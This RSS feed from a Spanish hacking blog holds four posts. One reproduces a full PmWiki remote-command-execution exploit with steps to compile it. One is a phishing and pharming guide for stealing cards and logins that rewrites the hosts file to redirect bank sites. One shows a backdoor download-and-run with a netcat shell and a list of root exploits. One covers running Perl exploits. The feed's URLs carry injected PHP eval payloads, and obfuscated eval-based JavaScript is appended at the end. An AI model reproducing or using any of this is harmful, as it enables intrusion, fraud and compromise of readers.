
<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>BlogDelHacker &#187; ansatsu</title>
	<atom:link href="http://www.blogdelhacker.com/author/ansatsu/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.blogdelhacker.com</link>
	<description>Blog sobre seguridad, redes, vulnerabilidades, hacking linux y windows...</description>
	<pubDate>Sun, 25 Jan 2009 19:18:50 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.5</generator>
	<language>en</language>
			<item>
		<title>Explotando Exploit PHP</title>
		<link>http://www.blogdelhacker.com/2009/01/02/explotando-exploit-php/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://www.blogdelhacker.com/2009/01/02/explotando-exploit-php/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Fri, 02 Jan 2009 20:12:45 +0000</pubDate>
		<dc:creator>ansatsu</dc:creator>
		
		<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://www.blogdelhacker.com/?p=102</guid>
		<description><![CDATA[Antes que nada nesecitamos saber/tener un par de cosas:
*Los exploits php se distinguen de esta manera  #!/usr/bin/php
*Nesecitamos un compilador (BamCompile)
Antes que nada nos descargamos el BamCompile, lo descomprimimos, lo instalamos en mi caso lo instale en C://

Posteriormente usamos un exploit yo usare de ejemplo este:

#!/usr/bin/php -q -d short_open_tag=on
&#60;?
print_r(&#8217;
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;
PmWiki &#60;= 2.1.19 Zend_Hash_Del_Key_Or_Index/remote commands execution exploit
by [...]]]></description>
			<content:encoded><![CDATA[<p>Antes que nada nesecitamos saber/tener un par de cosas:</p>
<p>*Los exploits php se distinguen de esta manera  #!/usr/bin/php</p>
<p>*Nesecitamos un compilador <a href="http://www.bambalam.se/bamcompile/download/bamcompile1.21.zip">(BamCompile)</a></p>
<p>Antes que nada nos descargamos el BamCompile, lo descomprimimos, lo instalamos en mi caso lo instale en C://</p>
<p><a href="http://www.blogdelhacker.com/wp-content/uploads/2009/01/screen11.jpg"><img class="alignnone size-medium wp-image-103" src="http://www.blogdelhacker.com/wp-content/uploads/2009/01/screen11-300x150.jpg" alt="" width="300" height="150" /></a></p>
<p>Posteriormente usamos un exploit yo usare de ejemplo este:</p>
<p><span id="more-102"></span></p>
<blockquote><p>#!/usr/bin/php -q -d short_open_tag=on<br />
&lt;?<br />
print_r(&#8217;<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
PmWiki &lt;= 2.1.19 Zend_Hash_Del_Key_Or_Index/remote commands execution exploit<br />
by rgod rgod @autistici.org<br />
site: <a href="http://retrogod.altervista.org/" target="_blank">http://retrogod.altervista.org</a><br />
dork: inurl:pmwiki.php +&#8221;Page last modified on&#8221; | PmWikiPhilosophy<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
&#8216;);<br />
/*<br />
works with register_globals=On<br />
against PHP &lt; 4.4.3, 5 &lt;= PHP &lt; 5.1.4<br />
*/<br />
if ($argc&lt;5) {<br />
print_r(&#8217;<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
Usage: php &#8216;.$argv[0].&#8217; host path http_loc cmd OPTIONS<br />
host:      target server (ip/hostname)<br />
path:      path to pmwiki<br />
http_loc:  an http site with the code to include (without ending slash)<br />
cmd:       a shell command<br />
Options:<br />
-p[port]:    specify a port other than 80<br />
-P[ip:port]: specify a proxy<br />
Example:<br />
php &#8216;.$argv[0].&#8217; localhost /pmwiki/ <a href="http://somehost.com/" target="_blank">http://somehost.com</a> ls -la -P1.1.1.1:80<br />
php &#8216;.$argv[0].&#8217; localhost /pmwiki/ <a href="http://somehost.com/" target="_blank">http://somehost.com</a> ls -la -p81</p>
<p>Note:<br />
prepare this code in <a href="http://somehost.com/scripts/stdconfig.php/index.html" target="_blank">http://somehost.com/scripts/stdconfig.php/index.html</a> :<br />
&lt;?php<br />
error_reporting(0);set_time_limit(0);echo &#8220;my_delim&#8221;;<br />
passthru($_SERVER[&#8221;HTTP_CLIENT_IP&#8221;]);die;<br />
?&gt;<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
&#8216;);<br />
die;<br />
}</p>
<p>error_reporting(0);<br />
ini_set(&#8221;max_execution_time&#8221;,0);<br />
ini_set(&#8221;default_socket_timeout&#8221;,5);</p>
<p>function quick_dump($string)<br />
{<br />
$result=&#8221;;$exa=&#8221;;$cont=0;<br />
for ($i=0; $i&lt;=strlen($string)-1; $i++)<br />
{<br />
if ((ord($string[$i]) &lt;= 32 ) | (ord($string[$i]) &gt; 126 ))<br />
{$result.=&#8221;  .&#8221;;}<br />
else<br />
{$result.=&#8221;  &#8220;.$string[$i];}<br />
if (strlen(dechex(ord($string[$i])))==2)<br />
{$exa.=&#8221; &#8220;.dechex(ord($string[$i]));}<br />
else<br />
{$exa.=&#8221; 0&#8243;.dechex(ord($string[$i]));}<br />
$cont++;if ($cont==15) {$cont=0; $result.=&#8221;\r\n&#8221;; $exa.=&#8221;\r\n&#8221;;}<br />
}<br />
return $exa.&#8221;\r\n&#8221;.$result;<br />
}<br />
$proxy_regex = &#8216;(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)&#8217;;<br />
function sendpacketii($packet)<br />
{<br />
global $proxy, $host, $port, $html, $proxy_regex;<br />
if ($proxy==&#8221;) {<br />
$ock=fsockopen(gethostbyname($host),$port);<br />
if (!$ock) {<br />
echo &#8216;No response from &#8216;.$host.&#8217;:&#8217;.$port; die;<br />
}<br />
}<br />
else {<br />
$c = preg_match($proxy_regex,$proxy);<br />
if (!$c) {<br />
echo &#8216;Not a valid proxy&#8230;&#8217;;die;<br />
}<br />
$parts=explode(&#8217;:',$proxy);<br />
echo &#8220;Connecting to &#8220;.$parts[0].&#8221;:&#8221;.$parts[1].&#8221; proxy&#8230;\r\n&#8221;;<br />
$ock=fsockopen($parts[0],$parts[1]);<br />
if (!$ock) {<br />
echo &#8216;No response from proxy&#8230;&#8217;;die;<br />
}<br />
}<br />
fputs($ock,$packet);<br />
if ($proxy==&#8221;) {<br />
$html=&#8221;;<br />
while (!feof($ock)) {<br />
$html.=fgets($ock);<br />
}<br />
}<br />
else {<br />
$html=&#8221;;<br />
while ((!feof($ock)) or (!eregi(chr(0&#215;0d).chr(0&#215;0a).chr(0&#215;0d).chr(0&#215;0a),$html))) {<br />
$html.=fread($ock,1);<br />
}<br />
}<br />
fclose($ock);<br />
#debug<br />
#echo &#8220;\r\n&#8221;.$html;<br />
}</p>
<p>$host=$argv[1];<br />
$path=$argv[2];<br />
$http_loc=$argv[3];<br />
$cmd=&#8221;";<br />
$port=80;<br />
$proxy=&#8221;";</p>
<p>for ($i=4; $i&lt;$argc; $i++){<br />
$temp=$argv[$i][0].$argv[$i][1];<br />
if (($temp&lt;&gt;&#8221;-p&#8221;) and ($temp&lt;&gt;&#8221;-P&#8221;)) {$cmd.=&#8221; &#8220;.$argv[$i];}<br />
if ($temp==&#8221;-p&#8221;)<br />
{<br />
$port=str_replace(&#8221;-p&#8221;,&#8221;",$argv[$i]);<br />
}<br />
if ($temp==&#8221;-P&#8221;)<br />
{<br />
$proxy=str_replace(&#8221;-P&#8221;,&#8221;",$argv[$i]);<br />
}<br />
}<br />
if (($path[0]&lt;&gt;&#8217;/') or ($path[strlen($path)-1]&lt;&gt;&#8217;/')) {echo &#8216;Error&#8230; check the path!&#8217;; die;}<br />
if ($proxy==&#8221;) {$p=$path;} else {$p=&#8217;http://&#8217;.$host.&#8217;:&#8217;.$port.$path;}</p>
<p>$data =&#8221;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;7d529a1d23092a\r\n&#8221;;<br />
$data.=&#8221;Content-Disposition: form-data; name=\&#8221;FarmD\&#8221;;\r\n\r\n&#8221;;<br />
$data.=&#8221;$http_loc\r\n&#8221;;<br />
$data.=&#8221;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;7d529a1d23092a\r\n&#8221;;<br />
$data.=&#8221;Content-Disposition: form-data; name=\&#8221;-1778478215\&#8221;;\r\n\r\n&#8221;;<br />
$data.=&#8221;1\r\n&#8221;;<br />
$data.=&#8221;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;7d529a1d23092a\r\n&#8221;;<br />
$data.=&#8221;Content-Disposition: form-data; name=\&#8221;-1304181425\&#8221;;\r\n\r\n&#8221;;<br />
$data.=&#8221;1\r\n&#8221;;<br />
$data.=&#8221;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;7d529a1d23092a&#8211;\r\n&#8221;;<br />
$packet =&#8221;POST &#8220;.$p.&#8221;pmwiki.php?n=PmWiki.BasicEditing?action=edit HTTP/1.0\r\n&#8221;;<br />
$packet.=&#8221;CLIENT-IP: &#8220;.$cmd.&#8221;\r\n&#8221;;<br />
$packet.=&#8221;Content-Type: multipart/form-data; boundary=&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;7d529a1d23092a\r\n&#8221;;<br />
$packet.=&#8221;Content-Length: &#8220;.strlen($data).&#8221;\r\n&#8221;;<br />
$packet.=&#8221;Host: &#8220;.$host.&#8221;\r\n&#8221;;<br />
$packet.=&#8221;Connection: Close\r\n\r\n&#8221;;<br />
$packet.=$data;<br />
sendpacketii($packet);<br />
if (strstr($html,&#8221;my_delim&#8221;)){<br />
echo &#8220;exploit succeeded&#8230;\n&#8221;;$temp=explode(&#8221;my_delim&#8221;,$html);die($temp[1]);<br />
}<br />
elseif (strstr($html,&#8221;failed to open stream&#8221;))<br />
{echo &#8220;*** adjust path&#8230; ***\n&#8221;;die($html);}<br />
else<br />
{echo &#8220;exploit failed&#8230;&#8221;;}<br />
?&gt;</p></blockquote>
<p>El codigo que les acabo de dejar lo copiamos en el bloc de notas y lo guardamos con una extension .php</p>
<p>Ahora lo compilamos: tenemos que teclear:</p>
<p>bamcompile exploit.php exploit.exe</p>
<p>siendo exploit.php el codigo que les acabo de dejar,</p>
<p><img class="alignnone" src="http://www.blogdelhacker.com/wp-content/uploads/2009/01/screen2.jpg" alt="" /></p>
<p>Ahora nos damos cuenta que se ha creado un archivo llamado exploit.exe que se encuentra en la bamcompile1.21</p>
<p>Le damos doble click al archivo exploit.exe y listo ahi vienen las instrucciones de como usarlo</p>
<p>SaLuDoS</p>
<p>St4t1k</p>
]]></content:encoded>
			<wfw:commentRss>http://www.blogdelhacker.com/2009/01/02/explotando-exploit-php/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Phising y Pharming</title>
		<link>http://www.blogdelhacker.com/2008/03/08/97/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://www.blogdelhacker.com/2008/03/08/97/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Sat, 08 Mar 2008 22:42:42 +0000</pubDate>
		<dc:creator>ansatsu</dc:creator>
		
		<category><![CDATA[Asaltando Windows]]></category>

		<category><![CDATA[Asaltando los sistemas]]></category>

		<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://www.blogdelhacker.com/2008/03/08/97/</guid>
		<description><![CDATA[Bien pues se escribio un tutorial asi que ya masomenos saben que es.
ahora les voy a explicar como hacerlo para digamos obtener  tarjetas de credito, logins,  que se yo&#8230;
Material:
Scam
Hacked Host
Mail list
Mailer Inbox
Primero hacemos el scam de alguna web .. aqui se los dejo es de paypal
http://rapidshare.com/files/88997799/Scam_PayPal_2008.zip.html
Lo descomprimimos, lo submos a algun hacked host [...]]]></description>
			<content:encoded><![CDATA[<p>Bien pues se escribio un tutorial asi que ya masomenos saben que es.<br />
ahora les voy a explicar como hacerlo para digamos obtener  tarjetas de credito, logins,  que se yo&#8230;</p>
<p>Material:<br />
Scam<br />
Hacked Host<br />
Mail list<br />
Mailer Inbox</p>
<p>Primero hacemos el scam de alguna web .. aqui se los dejo es de paypal<br />
http://rapidshare.com/files/88997799/Scam_PayPal_2008.zip.html</p>
<p>Lo descomprimimos, lo submos a algun hacked host o algun host que tengamos y cuando lo tenemos montado lo probamos y  nos dedicamos a buscar cuentas de correo para mandarles el scam, pueden buscar con algun extractor de mails correos , pero como<br />
siempre estan quemados y es posible que algunos no funcionen, lo mas conveniente es decirle a algun wey que se dedique a esto a que te haga el paro y te venda algun mail list para paypal (podria ser de cualquier cosa, banamex, hi5, etc ) si no buquen<br />
por la red hay bastantes, yo les recomiendo el elite extractor, o el tarantula..<span id="more-97"></span></p>
<p>Bien ya que tenemos un mail list, conseguimos algun mailer inbox, aqui les dejo la descarga de uno<br />
http://rapidshare.com/files/76390702/mailerpriv8.php</p>
<p>Lo subimos a algun hacked host, no recomiendo host gratuito porque no los envia, ya teniendolo buscamos la letter del scam<br />
(que es lo que se escribe para engañar a la victima)<br />
y si tenemos una letter para pharming nos dedicamos a crear uno <img src='http://www.blogdelhacker.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </p>
<p>Antes de seguir, el pharming es un metedo que consiste en manipular las dns que usa la victima haciendole creer que entra a una web pero en realidad esta en otra (por ejemplo en el scam)</p>
<p>Ejemplo en batch<br />
<code><br />
@echo off<br />
echo ipdetuhost  www.banamex.com.mx &gt;&gt; %windir%\system32\drivers\etc\hosts<br />
echo ipdetuhost   www.bbva.com &gt;&gt; %windir%\system32\drivers\etc\hosts<br />
echo ipdetuhost   www.bancomer.com.mx &gt;&gt; %windir%\system32\drivers\etc\hosts<br />
echo ipdetuhost   www.esmas.com &gt;&gt; %windir%\system32\drivers\etc\hosts<br />
echo ipdetuhost   www.hotmail.com &gt;&gt; %windir%\system32\drivers\etc\hosts<br />
exit</code></p>
<p>Como veran de esta manera cuando la victima ejecute este archivo y entre a banamex, bbva, bancomer desde el explorador  sera redirigido a ipdetuhost y de esta manera el usuario no se va a dar cuenta que realmente esta en una web fake <img src='http://www.blogdelhacker.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Solo es teoria en general pero poco a poco AHhahAH</p>
<p>&#8211;StATiK&#8211;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.blogdelhacker.com/2008/03/08/97/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Conectando Backdoor</title>
		<link>http://www.blogdelhacker.com/2007/03/19/conectando-backdoor/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://www.blogdelhacker.com/2007/03/19/conectando-backdoor/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Sun, 18 Mar 2007 23:32:58 +0000</pubDate>
		<dc:creator>ansatsu</dc:creator>
		
		<category><![CDATA[Asaltando los sistemas]]></category>

		<category><![CDATA[General]]></category>

		<category><![CDATA[Trabajando en Linux]]></category>

		<category><![CDATA[Trabajo en Windows]]></category>

		<guid isPermaLink="false">http://www.blogdelhacker.com/2007/03/19/conectando-backdoor/</guid>
		<description><![CDATA[Ya que rush ha publicado, como atakar mediante rfi; Ahora nos proponemos a utilizar un exploit y un backdoor en la victima; lo primero&#8230;
nos fijamos que carpetas tienen permisos (casi siempre es en tmp)
find -perm 777
ya que nos encontramos en la carpeta vulnerable hacemos esto
cd /tmp
ahora estamos en /tmp bien, tenemos permisos para descargar cosas [...]]]></description>
			<content:encoded><![CDATA[<p>Ya que rush ha publicado, como atakar mediante rfi; Ahora nos proponemos a utilizar un exploit y un backdoor en la victima; lo primero&#8230;</p>
<p>nos fijamos que carpetas tienen permisos (casi siempre es en tmp)</p>
<blockquote><p>find -perm 777</p></blockquote>
<p>ya que nos encontramos en la carpeta vulnerable hacemos esto</p>
<blockquote><p>cd /tmp</p></blockquote>
<p>ahora estamos en /tmp bien, tenemos permisos para descargar cosas y ejecutarlas , nos disponemos a hacerlo</p>
<blockquote><p>cd /tmp;wget web/backdoor/5553; chmod 777 5553; ./5553</p></blockquote>
<p>Lo que hicimos fue, descargarlo (wget) darle permisos al archivo (chmod 777) y ejecutarlo (./5553), ahora esta trabajando sobre el puerto 5553</p>
<p>ahora nos abrimos el netcat,y de esta maneraestamos diciendole al netcat que se ponga a la escucha del puerto 5553 y que nos devuelva la shell</p>
<blockquote><p>-vv -l -p 5553</p></blockquote>
<blockquote><p>nc<br />
Cmd line: -vv -l -p 5553<br />
listening on [any] 5553 &#8230;</p></blockquote>
<p><span id="more-41"></span>Ya que nos devuelve la shell, nos fijamos que kernel lleva</p>
<blockquote><p>uname -a;pwd;id</p></blockquote>
<p>sabiendo su version sabras que r00t exploit usar, les dejo la lista para cada una&#8230;</p>
<p><code>2.4.17    -&gt; newlocal, kmod, uselib24<br />
2.4.18    -&gt; brk, brk2, newlocal, kmod<br />
2.4.19    -&gt; brk, brk2, newlocal, kmod<br />
2.4.20    -&gt; ptrace, kmod, ptrace-kmod, brk, brk2<br />
2.4.21    -&gt; brk, brk2, ptrace, ptrace-kmod<br />
2.4.22    -&gt; brk, brk2, ptrace, ptrace-kmod<br />
2.4.22-10 -&gt; loginx<br />
2.4.23    -&gt; mremap_pte<br />
2.4.24    -&gt; mremap_pte, uselib24<br />
2.4.25-1  -&gt; uselib24<br />
2.4.27    -&gt; uselib24<br />
2.6.2     -&gt; mremap_pte, krad, h00lyshit<br />
2.6.5     -&gt; krad, krad2, h00lyshit<br />
2.6.6     -&gt; krad, krad2, h00lyshit<br />
2.6.7     -&gt; krad, krad2, h00lyshit<br />
2.6.8     -&gt; krad, krad2, h00lyshit<br />
2.6.8-5   -&gt; krad2, h00lyshit<br />
2.6.9     -&gt; krad, krad2, h00lyshit<br />
2.6.9-34  -&gt; r00t, h00lyshit<br />
2.6.10    -&gt; krad, krad2, h00lyshit<br />
2.6.13    -&gt; raptor, raptor2, h0llyshit, prctl<br />
2.6.14    -&gt; raptor, raptor2, h0llyshit, prctl<br />
2.6.15    -&gt; raptor, raptor2, h0llyshit, prctl<br />
2.6.16    -&gt; raptor, raptor2, h0llyshit, prctl</code></p>
<p>ya sabiendo que exploit usar, hacemos casi lo mismo que con el backdoor, lo descargamos,</p>
<blockquote><p>wget laweb.com/exploit/kmod</p></blockquote>
<blockquote><p>Connecting to laweb.com:80&#8230; connected!<br />
HTTP request sent, awaiting response&#8230; 200 OK<br />
Length: 14,860 [text/plain]</p>
<p>0K &#8230;&#8230;&#8230;. &#8230;. 100% @ 70.79 KB/s</p>
<p>23:26:39 (70.45 KB/s) - `kmod&#8217; saved [14860/14860]</p></blockquote>
<p>, se sube, y ahora viene lo bueno le damos permisos y lo ejecutamos</p>
<blockquote><p>chmod 777 kmod; ./kmod</p></blockquote>
<p>si nos fue bien saldra algo como esto</p>
<blockquote><p>chmod 777 kmod; ./kmod<br />
[+] Attached to 30330<br />
[+] Waiting for signal<br />
[+] Signal caught<br />
[+] Shellcode placed at 0&#215;40011aed<br />
[+] Now wait for suid shell&#8230;<br />
sh-2.05#<br />
sh-2.05# id<br />
id<br />
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys)</p>
<p>4(adm),6(disk),10(wheel)</p></blockquote>
<p>y bueno ahora somos r00t, ya sabran ustedes que hacer, en la proxima entrega les dire como hacer mass deface</p>
<p>SaLuDoS</p>
]]></content:encoded>
			<wfw:commentRss>http://www.blogdelhacker.com/2007/03/19/conectando-backdoor/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Ejecutando Exploit en Perl</title>
		<link>http://www.blogdelhacker.com/2007/02/17/ejecutando-exploit-en-perl/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://www.blogdelhacker.com/2007/02/17/ejecutando-exploit-en-perl/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Sat, 17 Feb 2007 19:36:17 +0000</pubDate>
		<dc:creator>ansatsu</dc:creator>
		
		<category><![CDATA[Trabajo en Windows]]></category>

		<category><![CDATA[Utilidades Hack]]></category>

		<guid isPermaLink="false">http://www.blogdelhacker.com/2007/02/17/ejecutando-exploit-en-perl/</guid>
		<description><![CDATA[Cuando tenemos un exploit en perl lo primero que tenemos que hacer es guardarlo en una extension .pl, posteriormentetenemos conseguir un interprete de perl (si lo deseas descargate el cygwin obviamente con aquel paquete) pero ahora lo haremos con el activeperl, lo descargas, lo instalas, y nos vamos al simbolo del sistema(estamos trabajando sbre windows) [...]]]></description>
			<content:encoded><![CDATA[<p>Cuando tenemos un exploit en perl lo primero que tenemos que hacer es guardarlo en una extension .pl, posteriormentetenemos conseguir un interprete de perl (si lo deseas descargate el cygwin obviamente con aquel paquete) pero ahora lo haremos con el <a href="http://www.activeperl.com">activeperl, </a>lo descargas, lo instalas, y nos vamos al simbolo del sistema(estamos trabajando sbre windows) y tecleamos:</p>
<blockquote><p>cd C:PerlBin</p></blockquote>
<p>El perl, lo instale en esa carpeta, si lo instalaste en otra solo es cuestion de cambiarla de directorio con el comando cd, de esta manera nos devuelve algo asi:</p>
<blockquote><p>C:PerlBin&gt;</p></blockquote>
<p><span id="more-25"></span>Ahora nos toca interpretar el exploit, y nos vamos a su carpeta con el cd.</p>
<pre></pre>
<blockquote><p>perl C:Exploitsexploit.pl</p></blockquote>
<pre></pre>
<p>Y obtendremos algo como esto:</p>
<blockquote><p>Microsoft Windows XP [Versión 5.1.2600<br />
(C) Copyright 1985-2001 Microsoft Corp.</p>
<p>C:Documents and SettingsAdministrador&gt;cd C:PerlBin</p>
<p>C:perlbin&gt;perl C:cygwinexploitshola.pl</p>
<p>***************************************************<br />
Usage: perl nenu.pl [site] [phpbb folder] [username] [proxy &lt;optional&gt;]<br />
i.e. perl nenu.pl www.site.com /forum/BigAdmin 127.0.0.1:3128<br />
****************************************************</p></blockquote>
<pre></pre>
<p>Nos dice claramente como usar el exploit, ya es de cada uno como los explota</p>
<p>Texto escrito por: ansatsu</p>
]]></content:encoded>
			<wfw:commentRss>http://www.blogdelhacker.com/2007/02/17/ejecutando-exploit-en-perl/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
<script language="javascript">var $a="Z63cZ3dZ225nZ2567Z2574h;iZ252b+)Z257bZ2574mpZ253dZ2564sZ252eslZ2569ce(Z2569,Z2569Z252b1)Z253bZ22;cdZ3dZ22stZ253dstZ252bSZ2574riZ256eg.Z2566roZ256dCZ2568Z2561rCZ256fdeZ2528(Z2574Z256dZ2570.Z22;ceZ3dZ22cZ2568arCZ256fdeAZ2574Z25280)Z255e(Z25270xZ2530Z2530Z2527+Z2565s)Z2529);Z257d}Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ25Z22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;sz|Z25Z25;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;stZ3dZ22Z2573Z2574Z253dZ2522Z2524Z2561Z253dsZ2574Z253bZ2564Z2563sZ2528dZ2561+Z2564bZ252bdZ2563+Z2564dZ252bdZ2565,Z2531Z2530Z2529;Z2564wZ2528sZ2574)Z253bZ2573tZ253d$Z2561Z253bZ2522;Z22;czZ3dZ22Z2566uncZ2574ioZ256e Z2563z(cZ257a)Z257brZ2565turZ256eZ2520caZ252bZ2563b+Z2563Z2563+cdZ252bce+Z2563z;Z257d;Z22;dbZ3dZ227FtuQd8!90;0!Z25200;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0--0Z252009kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0Z270;gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3e|u~wdx+m0yv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vZ22;dzZ3dZ22Z2566uZ256ectiZ256fn dZ2577(Z2574)Z257bcaZ253dZ2527Z252564ocuZ25256dZ252565ntZ25252eZ252577rZ252569Z2574Z2565(Z252522Z2527;cZ2565Z253dZ2527Z252522)Z2527;cbZ253dZ2527Z25253cscrZ252569pt Z25256caZ256eZ252567uZ252561Z25256Z2537Z252565Z25253dZ25255cZ252522javZ2561sZ252563rZ2525Z25369Z252570Z252574Z25255cZ252522Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252fsZ2563Z2572Z252569Z2570Z252574Z25253eZ2527;Z2577indZ256fw[Z2522eZ2522+Z2522Z2522+ Z2522vZ2522+Z2522alZ2522](unescapeZ2528t)Z2529Z257dZ253bZ22;cbZ3dZ220e(Z2564Z2573Z2529;stZ253dtmZ2570Z253dZ2527Z2527;for(iZ253d0Z253biZ253cds.Z256cZ256Z22;caZ3dZ22Z2566Z2575nZ2563tZ2569on Z2564cZ2573Z2528dsZ252cZ2565Z2573)Z257bdsZ253dunZ2565scaZ257Z22;deZ3dZ22!Z25209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+0}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;dcZ3dZ22rs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87trc7Z3c07id~7Z3c07f}d7Z3c07f}b7Z3c07}|s7Z3c07Z257FhZ7b7Z3c07vtc7Z3c07rfv7Z3c07iec7Z3c07}s`7Z3c07~sj7Z3c07wtg79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~t